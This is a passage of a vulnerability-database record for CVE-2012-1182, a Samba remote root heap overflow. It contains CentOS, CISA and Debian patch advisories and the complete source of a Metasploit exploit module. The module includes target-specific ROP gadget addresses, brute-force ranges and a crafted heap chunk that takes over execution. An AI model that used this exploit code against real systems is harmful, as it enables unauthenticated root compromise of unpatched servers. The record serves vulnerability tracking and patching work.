"https://www.exploit-db.com/download/21850/"}], "centos": [{"lastseen": "2019-12-20T18:25:36", "bulletinFamily": "unix", "cvelist": ["CVE-2012-1182"], "description": "**CentOS Errata and Security Advisory** CESA-2012:0466\n\n\nSamba is an open-source implementation of the Server Message Block (SMB) or\nCommon Internet File System (CIFS) protocol, which allows PC-compatible\nmachines to share files, printers, and other information.\n\nA flaw in the Samba suite's Perl-based DCE/RPC IDL (PIDL) compiler, used\nto generate code to handle RPC calls, resulted in multiple buffer overflows\nin Samba. A remote, unauthenticated attacker could send a specially-crafted\nRPC request that would cause the Samba daemon (smbd) to crash or, possibly,\nexecute arbitrary code with the privileges of the root user.\n(CVE-2012-1182)\n\nUsers of Samba are advised to upgrade to these updated packages, which\ncontain a backported patch to resolve this issue. After installing this\nupdate, the smb service will be restarted automatically.\n\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-announce/2012-April/030599.html\n\n**Affected packages:**\nsamba3x\nsamba3x-client\nsamba3x-common\nsamba3x-doc\nsamba3x-domainjoin-gui\nsamba3x-swat\nsamba3x-winbind\nsamba3x-winbind-devel\n\n**Upstream details at:**\nhttps://rhn.redhat.com/errata/RHSA-2012-0466.html", "edition": 3, "modified": "2012-04-10T21:13:02", "published": "2012-04-10T21:13:02", "href": "http://lists.centos.org/pipermail/centos-announce/2012-April/030599.html", "id": "CESA-2012:0466", "title": "samba3x security update", "type": "centos", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-12-20T18:26:55", "bulletinFamily": "unix", "cvelist": ["CVE-2012-1182"], "description": "**CentOS Errata and Security Advisory** CESA-2012:0465\n\n\nSamba is an open-source implementation of the Server Message Block (SMB) or\nCommon Internet File System (CIFS) protocol, which 
allows PC-compatible\nmachines to share files, printers, and other information.\n\nA flaw in the Samba suite's Perl-based DCE/RPC IDL (PIDL) compiler, used\nto generate code to handle RPC calls, resulted in multiple buffer overflows\nin Samba. A remote, unauthenticated attacker could send a specially-crafted\nRPC request that would cause the Samba daemon (smbd) to crash or, possibly,\nexecute arbitrary code with the privileges of the root user.\n(CVE-2012-1182)\n\nUsers of Samba are advised to upgrade to these updated packages, which\ncontain a backported patch to resolve this issue. After installing this\nupdate, the smb service will be restarted automatically.\n\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-announce/2012-April/030600.html\nhttp://lists.centos.org/pipermail/centos-announce/2012-April/030603.html\n\n**Affected packages:**\nlibsmbclient\nlibsmbclient-devel\nsamba\nsamba-client\nsamba-common\nsamba-doc\nsamba-domainjoin-gui\nsamba-swat\nsamba-winbind\nsamba-winbind-clients\nsamba-winbind-devel\nsamba-winbind-krb5-locator\n\n**Upstream details at:**\n", "edition": 3, "modified": "2012-04-10T23:59:51", "published": "2012-04-10T21:30:27", "href": "http://lists.centos.org/pipermail/centos-announce/2012-April/030600.html", "id": "CESA-2012:0465", "title": "libsmbclient, samba security update", "type": "centos", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-10-30T13:21:02", "bulletinFamily": "unix", "cvelist": ["CVE-2012-1182"], "description": "**CentOS Errata and Security Advisory** CESA-2013:0506\n\n\nSamba is an open-source implementation of the Server Message Block (SMB) or\nCommon Internet File System (CIFS) protocol, which allows PC-compatible\nmachines to share files, printers, and other information.\n\nA flaw was found in the Samba suite's Perl-based DCE/RPC IDL (PIDL)\ncompiler, used to generate code to handle RPC calls. 
This could result in\ncode generated by the PIDL compiler to not sufficiently protect against\nbuffer overflows. (CVE-2012-1182)\n\nThe samba4 packages have been upgraded to upstream version 4.0.0, which\nprovides a number of bug fixes and enhancements over the previous version.\nIn particular, improved interoperability with Active Directory (AD)\ndomains. SSSD now uses the libndr-krb5pac library to parse the Privilege\nAttribute Certificate (PAC) issued by an AD Key Distribution Center (KDC).\n\nThe Cross Realm Kerberos Trust functionality provided by Identity\nManagement, which relies on the capabilities of the samba4 client library,\nis included as a Technology Preview. This functionality and server\nlibraries, is included as a Technology Preview. This functionality uses the\nlibndr-nbt library to prepare Connection-less Lightweight Directory Access\nProtocol (CLDAP) messages.\n\nAdditionally, various improvements have been made to the Local Security\nAuthority (LSA) and Net Logon services to allow verification of trust\nfrom a Windows system. Because the Cross Realm Kerberos Trust functionality\nis considered a Technology Preview, selected samba4 components are\nconsidered to be a Technology Preview. For more information on which Samba\npackages are considered a Technology Preview, refer to Table 5.1, \"Samba4\nPackage Support\" in the Release Notes, linked to from the References.\n(BZ#766333, BZ#882188)\n\nThis update also fixes the following bug:\n\n* Prior to this update, if the Active Directory (AD) server was rebooted,\nWinbind sometimes failed to reconnect when requested by \"wbinfo -n\" or\n\"wbinfo -s\" commands. Consequently, looking up users using the wbinfo tool\nfailed. 
This update applies upstream patches to fix this problem and now\nlooking up a Security Identifier (SID) for a username, or a username for a\ngiven SID, works as expected after a domain controller is rebooted.\n(BZ#878564)\n\nAll users of samba4 are advised to upgrade to these updated packages,\nwhich fix these issues and add these enhancements.\n\nWarning: If you upgrade from Red Hat Enterprise Linux 6.3 to Red Hat\nEnterprise Linux 6.4 and you have Samba in use, you should make sure that\nyou uninstall the package named \"samba4\" to avoid conflicts during the\nupgrade.\n\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-announce/2013-March/031536.html\nhttp://lists.centos.org/pipermail/centos-cr-announce/2013-February/006889.html\n\n**Affected packages:**\nsamba4\nsamba4-client\nsamba4-common\nsamba4-dc\nsamba4-dc-libs\nsamba4-devel\nsamba4-libs\nsamba4-pidl\nsamba4-python\nsamba4-swat\nsamba4-test\nsamba4-winbind\nsamba4-winbind-clients\nsamba4-winbind-krb5-locator\n\n**Upstream details at:**\nhttps://rhn.redhat.com/errata/RHSA-2013-0506.html", "edition": 7, "modified": "2013-03-09T00:42:54", "published": "2013-02-27T19:38:13", "href": "http://lists.centos.org/pipermail/centos-cr-announce/2013-February/006889.html", "id": "CESA-2013:0506", "title": "samba4 security update", "type": "centos", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-10-30T13:20:22", "bulletinFamily": "unix", "cvelist": ["CVE-2012-1182"], "description": "**CentOS Errata and Security Advisory** CESA-2013:0515\n\n\nThe openchange packages provide libraries to access Microsoft Exchange\nservers using native protocols. Evolution-MAPI uses these libraries to\nintegrate the Evolution PIM application with Microsoft Exchange servers.\n\nA flaw was found in the Samba suite's Perl-based DCE/RPC IDL (PIDL)\ncompiler. 
As OpenChange uses code generated by PIDL, this could have\nresulted in buffer overflows in the way OpenChange handles RPC calls. With\nthis update, the code has been generated with an updated version of PIDL to\ncorrect this issue. (CVE-2012-1182)\n\nThe openchange packages have been upgraded to upstream version 1.0, which\nprovides a number of bug fixes and enhancements over the previous version,\nincluding support for the rebased samba4 packages and several API changes.\n(BZ#767672, BZ#767678)\n\nThis update also fixes the following bugs:\n\n* When the user tried to modify a meeting with one required attendee and\nhimself as the organizer, a segmentation fault occurred in the memcpy()\nfunction. Consequently, the evolution-data-server application terminated\nunexpectedly with a segmentation fault. This bug has been fixed and\nevolution-data-server no longer crashes in the described scenario.\n(BZ#680061)\n\n* Prior to this update, OpenChange 1.0 was unable to send messages with\na large message body or with extensive attachment. This was caused by minor\nissues in OpenChange's exchange.idl definitions. 
This bug has been fixed\nand OpenChange now sends extensive messages without complications.\n(BZ#870405)\n\nAll users of openchange are advised to upgrade to these updated packages,\nwhich fix these issues and add these enhancements.\n\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-announce/2013-March/031358.html\nhttp://lists.centos.org/pipermail/centos-announce/2013-March/031491.html\nhttp://lists.centos.org/pipermail/centos-cr-announce/2013-February/006708.html\nhttp://lists.centos.org/pipermail/centos-cr-announce/2013-February/006844.html\n\n**Affected packages:**\nevolution-mapi\nevolution-mapi-devel\nopenchange\nopenchange-client\nopenchange-devel\nopenchange-devel-docs\n\n**Upstream details at:**\nhttps://rhn.redhat.com/errata/RHSA-2013-0515.html", "edition": 87, "modified": "2013-03-09T00:42:10", "published": "2013-02-27T19:34:43", "href": "http://lists.centos.org/pipermail/centos-cr-announce/2013-February/006708.html", "id": "CESA-2013:0515", "title": "evolution, openchange security update", "type": "centos", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "cisa": [{"lastseen": "2021-02-24T18:08:38", "bulletinFamily": "info", "cvelist": ["CVE-2012-1182"], "description": "Samba has released an update to address a vulnerability in Samba versions 3.6.3 and all previous versions. Exploitation of this vulnerability may allow a remote attacker to use anonymous connections to execute arbitrary code with root privileges. \n \nUS-CERT encourages users and administrators to review the recent [Samba Security Announcement](<https://www.samba.org/samba/security/CVE-2012-1182>) and apply any necessary updates to help mitigate the risk. 
\n", "modified": "2012-10-23T00:00:00", "published": "2012-04-11T00:00:00", "id": "CISA:C73BC9C5DAF991808EA4A267072DA584", "href": "https://us-cert.cisa.gov/ncas/current-activity/2012/04/11/Samba-Releases-Updates-30x-363", "type": "cisa", "title": "Samba Releases Updates for 3.0.x - 3.6.3 ", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "metasploit": [{"lastseen": "2020-10-13T00:14:50", "description": "This module triggers a vulnerability in the LSA RPC service of the Samba daemon because of an error on the PIDL auto-generated code. Making a specially crafted call to SetInformationPolicy to set a PolicyAuditEventsInformation allows to trigger a heap overflow and finally execute arbitrary code with root privileges. The module uses brute force to guess the stackpivot/rop chain or the system() address and redirect flow there in order to bypass NX. The start and stop addresses for brute forcing have been calculated empirically. 
On the other hand the module provides the StartBrute and StopBrute which allow the user to configure his own addresses.\n", "published": "2012-09-27T23:18:52", "type": "metasploit", "title": "Samba SetInformationPolicy AuditEventsInfo Heap Overflow", "bulletinFamily": "exploit", "cvelist": ["CVE-2012-1182"], "modified": "2020-10-02T20:00:37", "id": "MSF:EXPLOIT/LINUX/SAMBA/SETINFOPOLICY_HEAP", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = NormalRanking\n\n include Msf::Exploit::Remote::DCERPC\n include Msf::Exploit::Remote::SMB::Client\n include Msf::Exploit::RopDb\n include Msf::Exploit::Brute\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Samba SetInformationPolicy AuditEventsInfo Heap Overflow',\n 'Description' => %q{\n This module triggers a vulnerability in the LSA RPC service of the Samba daemon\n because of an error on the PIDL auto-generated code. Making a specially crafted\n call to SetInformationPolicy to set a PolicyAuditEventsInformation allows to\n trigger a heap overflow and finally execute arbitrary code with root privileges.\n\n The module uses brute force to guess the stackpivot/rop chain or the system()\n address and redirect flow there in order to bypass NX. The start and stop addresses\n for brute forcing have been calculated empirically. 
On the other hand the module\n provides the StartBrute and StopBrute which allow the user to configure his own\n addresses.\n },\n 'Author' =>\n [\n 'Unknown', # Vulnerability discovery\n 'blasty', # Exploit\n 'mephos', # Metasploit module\n 'sinn3r', # Metasploit module\n 'juan vazquez' # Metasploit module\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n ['CVE', '2012-1182'],\n ['OSVDB', '81303'],\n ['BID', '52973'],\n ['ZDI', '12-069']\n ],\n 'Privileged' => true,\n 'Payload' =>\n {\n 'DisableNops' => true,\n 'Space' => 600,\n },\n 'Platform' => %w{ linux unix },\n # smbd process is killed soon after being exploited, need fork with meterpreter\n 'DefaultOptions' => { \"PrependSetreuid\" => true, \"PrependSetregid\" => true, \"PrependFork\" => true, \"AppendExit\" => true, \"WfsDelay\" => 5},\n 'Targets' =>\n [\n ['2:3.5.11~dfsg-1ubuntu2 on Ubuntu Server 11.10',\n {\n 'Arch' => ARCH_X86,\n 'Offset' => 0x11c0,\n 'Ropname' => 'Ubuntu 11.10 / 2:3.5.8~dfsg-1ubuntu2',\n 'Stackpivot' => 0x0004393c, # xchg eax, esp ; ret in /lib/i386-linux-gnu/libgcrypt.so.11.7.0\n 'Bruteforce' =>\n {\n 'Start' => { 'libgcrypt_base' => 0xb67f1000 },\n 'Stop' => { 'libgcrypt_base' => 0xb69ef000 },\n 'Step' => 0x1000\n }\n }\n ],\n ['2:3.5.8~dfsg-1ubuntu2 on Ubuntu Server 11.10',\n {\n 'Arch' => ARCH_X86,\n 'Offset' => 0x11c0,\n 'Ropname' => 'Ubuntu 11.10 / 2:3.5.8~dfsg-1ubuntu2',\n 'Stackpivot' => 0x0004393c, # xchg eax, esp ; ret in /lib/i386-linux-gnu/libgcrypt.so.11.7.0\n 'Bruteforce' =>\n {\n 'Start' => { 'libgcrypt_base' => 0xb68d9000 },\n 'Stop' => { 'libgcrypt_base' => 0xb6ad7000 },\n 'Step' => 0x1000\n }\n }\n ],\n ['2:3.5.8~dfsg-1ubuntu2 on Ubuntu Server 11.04',\n {\n 'Arch' => ARCH_X86,\n 'Offset' => 0x11c0,\n 'Ropname' => 'Ubuntu 11.04 / 2:3.5.8~dfsg-1ubuntu2',\n # when stack pivoting, we control dword [esi] (field \"next\" in talloc chunk), ecx and [esp+4] point to shellcode\n 'Stackpivot' => 0x0006af03, # pop ecx ; jmp dword [esi] in 
/lib/i386-linux-gnu/libgcrypt.so.11.6.0\n # we jump on \"pop ecx, jmp dword [esi] to remove 4 bytes from the stack, then jump on pop esp.. gadget\n # to effectively stack pivot\n 'Stackpivot_helper' => 0x00054e87, #pop esp ; pop ebx ; pop esi ; pop edi ; pop ebp ; ret ;\n 'Bruteforce' =>\n {\n 'Start' => { 'libgcrypt_base' => 0xb6973000 },\n 'Stop' => { 'libgcrypt_base' => 0xb6b71000 },\n 'Step' => 0x1000\n }\n }\n ],\n # default version when installing 11.04 is 3.5.8 , 3.5.4 was PROPOSED on CD months before release date\n #['2:3.5.4~dfsg-1ubuntu8 on Ubuntu 11.04',\n #\t{\n #\t\t'Arch' => ARCH_CMD,\n #\t\t'Offset' => 0x11c0,\n #\t\t'Ropname' => 'Ubuntu 11.04 / 2:3.5.4~dfsg-1ubuntu8',\n #\t\t'Stackpivot' => 0,\n #\t\t'Bruteforce' =>\n #\t\t{\n #\t\t\t# The start should be 0x950 aligned, and then step 0x1000.\n #\t\t\t'Start' => { 'Ret' => 0x00230950 },\n #\t\t\t'Stop' => { 'Ret' => 0x22a00950 },\n #\t\t\t'Step' => 0x1000\n #\t\t}\n #\t}\n #],\n ['2:3.5.4~dfsg-1ubuntu8 on Ubuntu Server 10.10',\n {\n 'Arch' => ARCH_X86,\n 'Offset' => 0x11c0,\n 'Ropname' => 'Ubuntu 10.10 / 2:3.5.4~dfsg-1ubuntu8',\n 'Stackpivot' => 0x0003e4bc, #xchg eax, esp ; ret in libgcrypt.so.11.5.3\n 'Bruteforce' =>\n {\n 'Start' => { 'libgcrypt_base' => 0xb694f000 },\n 'Stop' => { 'libgcrypt_base' => 0xb6b4d000 },\n 'Step' => 0x1000\n }\n }\n ],\n ['2:3.5.6~dfsg-3squeeze6 on Debian Squeeze',\n {\n 'Arch' => ARCH_X86,\n 'Offset' => 0x11c0,\n 'Ropname' => 'Debian Squeeze / 2:3.5.6~dfsg-3squeeze6',\n 'Stackpivot' => 0x0003e30c, #xchg eax, esp ; ret in libgcrypt.so.11.5.3\n 'Bruteforce' =>\n {\n 'Start' => { 'libgcrypt_base' => 0xb6962000 },\n 'Stop' => { 'libgcrypt_base' => 0xb6a61000 },\n 'Step' => 0x1000\n }\n }\n ],\n ['3.5.10-0.107.el5 on CentOS 5',\n {\n 'Arch' => ARCH_X86,\n 'Offset' => 0x11c0,\n 'Ropname' => '3.5.10-0.107.el5 on CentOS 5',\n 'Stackpivot' => 0x0006ad7e, #xchg eax, esp ; xchg eax, ebx ; add eax, 0xCB313435 ; or ecx, eax ; ret in libgcrypt.so.11.5.2\n 'Bruteforce' =>\n {\n 
'Start' => { 'libgcrypt_base' => 0x0037c000 },\n 'Stop' => { 'libgcrypt_base' => 0x09e73000 },\n 'Step' => 0x1000\n }\n }\n ]\n\n ],\n 'DisclosureDate' => '2012-04-10',\n 'DefaultTarget' => 0\n ))\n\n register_options([\n OptInt.new(\"StartBrute\", [ false, \"Start Address For Brute Forcing\" ]),\n OptInt.new(\"StopBrute\", [ false, \"Stop Address For Brute Forcing\" ])\n ])\n\n deregister_options('SMB::ProtocolVersion')\n end\n\n def exploit\n if target.bruteforce?\n bf = target.bruteforce\n\n if datastore['StartBrute'] and datastore['StartBrute'] > 0\n bf.start_addresses['libgcrypt_base'] = datastore['StartBrute']\n end\n\n if datastore['StopBrute'] and datastore['StopBrute'] > 0\n bf.stop_addresses['libgcrypt_base'] = datastore['StopBrute']\n end\n\n if bf.start_addresses['libgcrypt_base'] > bf.stop_addresses['libgcrypt_base']\n raise ArgumentError, \"StartBrute should not be larger than StopBrute\"\n end\n end\n super\n end\n\n def brute_exploit(target_addrs)\n print_status(\"Trying to exploit Samba with address 0x%.8x...\" % target_addrs['libgcrypt_base'])\n datastore['DCERPC::fake_bind_multi'] = false\n datastore['DCERPC::max_frag_size'] = 4248\n datastore['DCERPC::smb_pipeio'] = 'trans'\n datastore['DCERPC::ReadTimeout'] = 3\n\n pipe = \"lsarpc\"\n\n vprint_status('Use Rex client (SMB1 only) since this module is not compatible with RubySMB client')\n connect(versions: [1])\n smb_login()\n\n handle = dcerpc_handle('12345778-1234-abcd-ef00-0123456789ab', '0.0', 'ncacn_np', [\"\\\\#{pipe}\"])\n dcerpc_bind(handle)\n dcerpc.socket.mode = 'rw'\n # revert for other exploits\n datastore['DCERPC::smb_pipeio'] = 'rw'\n\n cmd = \";;;;\" # padding\n helper = 0\n if target['Arch'] == ARCH_CMD\n cmd << \"#{payload.encoded}\\x00\" # system argument\n tmp = cmd * (816/cmd.length)\n tmp << \"\\x00\"*(816-tmp.length)\n ret_addr = addr\n elsif target['Arch'] == ARCH_X86\n cmd << generate_rop_payload('samba', payload.encoded,{'target'=>target['Ropname'], 'base'=> 
target_addrs['libgcrypt_base'] })\n tmp = cmd\n tmp << \"\\x00\"*(816-tmp.length)\n ret_addr = target_addrs['libgcrypt_base']+target['Stackpivot']\n # will help in stack pivot when it's not eax pointing to shellcode\n if target['Stackpivot_helper']\n helper = target_addrs['libgcrypt_base']+target['Stackpivot_helper']\n end\n end\n\n stub = \"X\" * 20\n\n stub << NDR.short(2) # level\n stub << NDR.short(2) # level 2\n stub << NDR.long(1) # auditing mode\n stub << NDR.long(1) # ptr\n stub << NDR.long(100000) # r-> count\n stub << NDR.long(20) # array size\n stub << NDR.long(0)\n stub << NDR.long(100)\n stub << rand_text_alpha(target['Offset'])\n # Crafted talloc chunk\n #stub << 'A' * 8 # next, prev\n stub << NDR.long(helper) + 'A'*4 # next, prev\n stub << NDR.long(0) + NDR.long(0) # parent, child\n stub << NDR.long(0) # refs\n #\t\tstub << NDR.long(target_addrs['Ret']) # destructor # will become EIP\n stub << NDR.long(ret_addr) # destructor # will become EIP\n stub << NDR.long(0) # name\n stub << \"AAAA\" # size\n stub << NDR.long(0xe8150c70) # flags\n stub << \"AAAABBBB\"\n stub << tmp # pointer to tmp+4 in $esp\n stub << rand_text(32632)\n stub << rand_text(62000)\n\n begin\n call(dcerpc, 0x08, stub)\n rescue Rex::Proto::DCERPC::Exceptions::NoResponse, Rex::Proto::SMB::Exceptions::NoReply, ::EOFError\n rescue Rex::Proto::DCERPC::Exceptions::Fault\n print_error('Server is most likely patched...')\n rescue Timeout::Error\n print_status(\"Timeout\")\n rescue Rex::Proto::SMB::Exceptions::LoginError\n print_status(\"Rex::Proto::SMB::Exceptions::LoginError\")\n rescue => e\n if e.to_s =~ /STATUS_PIPE_DISCONNECTED/\n print_status('Server disconnected, this is expected')\n end\n end\n handler()\n disconnect()\n end\n\n def check\n begin\n vprint_status('Connect with SMB1 for the check method, since it needs native_lm info')\n connect(versions: [1])\n smb_login()\n disconnect()\n\n version = smb_peer_lm().scan(/Samba (\\d\\.\\d.\\d*)/).flatten[0]\n minor = 
version.scan(/\\.(\\d*)$/).flatten[0].to_i\n vprint_status(\"Version found: #{version}\")\n\n return Exploit::CheckCode::Appears if version =~ /^3\\.4/ and minor < 16\n return Exploit::CheckCode::Appears if version =~ /^3\\.5/ and minor < 14\n return Exploit::CheckCode::Appears if version =~ /^3\\.6/ and minor < 4\n\n return Exploit::CheckCode::Safe\n\n rescue ::Exception\n return CheckCode::Unknown\n end\n end\n\n # Perform a DCE/RPC Function Call\n def call(dcerpc, function, data, do_recv = true)\n\n frag_size = data.length\n if dcerpc.options['frag_size']\n frag_size = dcerpc.options['frag_size']\n end\n object_id = ''\n if dcerpc.options['object_call']\n object_id = dcerpc.handle.uuid[0]\n end\n if options['random_object_id']\n object_id = Rex::Proto::DCERPC::UUID.uuid_unpack(Rex::Text.rand_text(16))\n end\n\n call_packets = make_request(function, data, frag_size, dcerpc.context, object_id)\n call_packets.each { |packet|\n write(dcerpc, packet)\n }\n\n return true if not do_recv\n\n raw_response = ''\n\n begin\n raw_response = dcerpc.read()\n rescue ::EOFError\n raise Rex::Proto::DCERPC::Exceptions::NoResponse\n end\n\n if (raw_response == nil or raw_response.length == 0)\n raise Rex::Proto::DCERPC::Exceptions::NoResponse\n end\n\n\n dcerpc.last_response = Rex::Proto::DCERPC::Response.new(raw_response)\n\n if dcerpc.last_response.type == 3\n e = Rex::Proto::DCERPC::Exceptions::Fault.new\n e.fault = dcerpc.last_response.status\n raise e\n end\n\n dcerpc.last_response.stub_data\n end\n\n # Used to create standard DCERPC REQUEST packet(s)\n def make_request(opnum=0, data=\"\", size=data.length, ctx=0, object_id = '')\n\n opnum = opnum.to_i\n size = size.to_i\n ctx = ctx.to_i\n\n chunks, frags = [], []\n ptr = 0\n\n # Break the request into fragments of 'size' bytes\n while ptr < data.length\n chunks.push( data[ ptr, size ] )\n ptr += size\n end\n\n # Process requests with no stub data\n if chunks.length == 0\n frags.push( 
Rex::Proto::DCERPC::Packet.make_request_chunk(3, opnum, '', ctx, object_id) )\n return frags\n end\n\n # Process requests with only one fragment\n if chunks.length == 1\n frags.push( Rex::Proto::DCERPC::Packet.make_request_chunk(3, opnum, chunks[0], ctx, object_id) )\n return frags\n end\n\n # Create the first fragment of the request\n frags.push( Rex::Proto::DCERPC::Packet.make_request_chunk(1, opnum, chunks.shift, ctx, object_id) )\n\n # Create all of the middle fragments\n while chunks.length != 1\n frags.push( Rex::Proto::DCERPC::Packet.make_request_chunk(0, opnum, chunks.shift, ctx, object_id) )\n end\n\n # Create the last fragment of the request\n frags.push( Rex::Proto::DCERPC::Packet.make_request_chunk(2, opnum, chunks.shift, ctx, object_id) )\n\n return frags\n end\n\n # Write data to the underlying socket\n def write(dcerpc, data)\n dcerpc.socket.write(data)\n data.length\n end\nend\n\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/linux/samba/setinfopolicy_heap.rb"}], "debian": [{"lastseen": "2020-11-11T13:16:10", "bulletinFamily": "unix", "cvelist": ["CVE-2012-1182"], "description": "- -------------------------------------------------------------------------\nDebian Security Advisory DSA-2450-1 security@debian.org\nhttp://www.debian.org/security/ Thijs Kinkhorst\nApril 12, 2012 http://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : samba\nVulnerability : privilege escalation\nProblem type : remote\nDebian-specific: no\nCVE ID : CVE-2012-1182\nDebian Bug : 668309\n\nIt was discovered that Samba, the SMB/CIFS file, print, and login server,\ncontained a flaw in the remote procedure call (RPC) code which allowed\nremote code execution as the super user from an unauthenticated\nconnection.\n\nFor the stable distribution (squeeze), this problem has been fixed in\nversion 
2:3.5.6~dfsg-3squeeze7.\n\nFor the testing distribution (wheezy), this problem will be fixed soon.\n\nFor the unstable distribution (sid), this problem has been fixed in\nversion 2:3.6.4-1.\n\nWe recommend that you upgrade your samba packages.\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: http://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org\n", "edition": 3, "modified": "2012-04-12T20:30:03", "published": "2012-04-12T20:30:03", "id": "DEBIAN:DSA-2450-1:77F45", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2012/msg00080.html", "title": "[SECURITY] [DSA 2450-1] samba security update", "type": "debian", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}]}